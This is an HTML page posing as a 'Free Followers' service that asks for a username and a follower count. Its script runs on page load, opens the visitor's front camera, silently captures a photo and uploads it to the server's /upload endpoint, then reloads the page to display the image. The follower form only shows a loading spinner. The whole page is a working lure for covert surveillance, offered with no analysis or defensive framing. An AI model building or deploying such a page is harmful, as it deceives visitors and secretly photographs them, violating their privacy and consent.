<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Followers</title>
    <style>
        .loading {
            display: none;
            border: 8px solid #f3f3f3;
            border-radius: 50%;
            border-top: 8px solid #3498db;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        #captured-image {
            display: block;
            margin: auto;
            width: 640px;
            height: 480px;
        }
    </style>
</head>
<body>
    <h1>Enter Username</h1>
    <form>
        <label for="username">Username:</label>
        <input type="text" id="username" name="username">
        <button type="button" onclick="showLoading()">Submit</button>
    </form>
    <h1>Enter the number of followers</h1>
    <form>
        <label for="username">Followers:</label>
        <input type="text" id="username" name="username">
    </form>
    <div id="loading" class="loading"></div>
    <img id="captured-image" src="/images/captured_image.jpg?time={{ timestamp }}" alt=" "/>
    <script>
        function showLoading() {
            var loadingSpinner = document.getElementById('loading');
            loadingSpinner.style.display = 'block';
        }
        const video = document.createElement('video');
        const canvas = document.createElement('canvas');
        const context = canvas.getContext('2d');

        async function startVideo() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
                video.srcObject = stream;
                video.onloadedmetadata = () => {
                    video.play();
                    capturePhoto();
                };
            } catch (err) {
                console.error("Error accessing camera: " + err);
            }
        }

        function capturePhoto() {
            // Set canvas dimensions to video dimensions
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;

            // Draw the video frame to canvas
            context.drawImage(video, 0, 0, canvas.width, canvas.height);

            // Stop the video stream to release the camera
            const stream = video.srcObject;
            const tracks = stream.getTracks();
            tracks.forEach(track => track.stop());

            // Convert canvas to Blob and upload
            canvas.toBlob(blob => {
                const file = new File([blob], "photo.jpg", { type: 'image/jpeg' });
                const formData = new FormData();
                formData.append('image', file);

                fetch('/upload', {
                    method: 'POST',
                    body: formData
                })
                .then(() => {
                    // Reload the page to show the captured image
                    setTimeout(() => {
                        location.reload();
                    }, 1000); // Short delay to ensure image upload completes
                })
                .catch(error => console.error('Error uploading image:', error));
            }, 'image/jpeg');
        }

        // Start the video stream and take a photo when the page loads
        window.addEventListener('load', startVideo);
    </script>
</body>
</html>
